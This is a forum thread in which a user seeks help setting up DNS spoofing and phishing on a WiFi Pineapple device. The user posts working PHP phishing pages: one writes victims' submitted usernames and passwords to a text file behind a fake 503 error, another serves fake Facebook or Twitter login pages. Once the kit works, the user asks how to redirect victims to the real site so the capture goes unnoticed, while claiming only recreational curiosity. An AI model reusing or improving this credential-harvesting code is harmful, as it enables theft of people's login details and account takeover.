Jump to content

Is anyone willing to jump on Teamviewer to help set my DNS spoofing up?


kdmcshane

Recommended Posts

I can't even express how many tutorials I've tried following to get this to work and its still not working. This is the most recent tutorial I tried doing.

http://hak5.org/hack/pineapple-phishing

I followed every little instruction on this tutorial and it still doesn't work.

If someone that is pretty savy and could set this up easy within a short period of time could jump on teamviewer and take a look at what I did wrong and why its not working, I'd really appreciate that.

Link to comment
Share on other sites

Here's a snapshot of my php files.

error.php

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("bitches.txt", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>
<html><body>
<h1>503 Service Unavailable</h1>
</body></html>


--------------------------------------------------------------------------------------------------------------------------------------
index.php

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<body>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------------------------
redirect.php

<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, "facebook")) { header('Location: facebook.html'); }
if (strpos($ref, "twitter")) { header('Location: twitter.html'); }
require('peets.html');
?>
-------------------------------------------------------------------------------------------------------------------------------
Link to comment
Share on other sites

At one point, I was able to get something to load when I typed in facebook.com, but that actually just went to a page listing all the files I had in my www folder on the pineapple.
I don't want to do this because I want to collect other people's usernames and passwords. Even if I got them, you couldn't use them because their account wouldn't recognize your device but I simply enjoy the fascination of seeing these things in work. I've tried a lot of other stuff on the pineapple but this is my first attempt trying to do DNS spoofing and or pineapple phishing purely for recreational curiosity and nothing malicious. I've been working on trying to get this working for 10 hours straight and right when I think I am going to get it to work, it doesn't work.

I'm going to continue to try to work on getting this to work tomorrow but if anyone is generous enough and are able enough to look past my noob appearance, I would greatly appreciate any help you can give me over teamviewer.

Edited by kdmcshane
Link to comment
Share on other sites

No. I didn't realize that right away but I fixed everything and I have everything working now. But there is one thing I want to do that I don't know how to do. Instead of the error.php file just sending someone to the white page saying 503 gateway error, how do I just have it redirect them to the real website?

Edited by kdmcshane
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...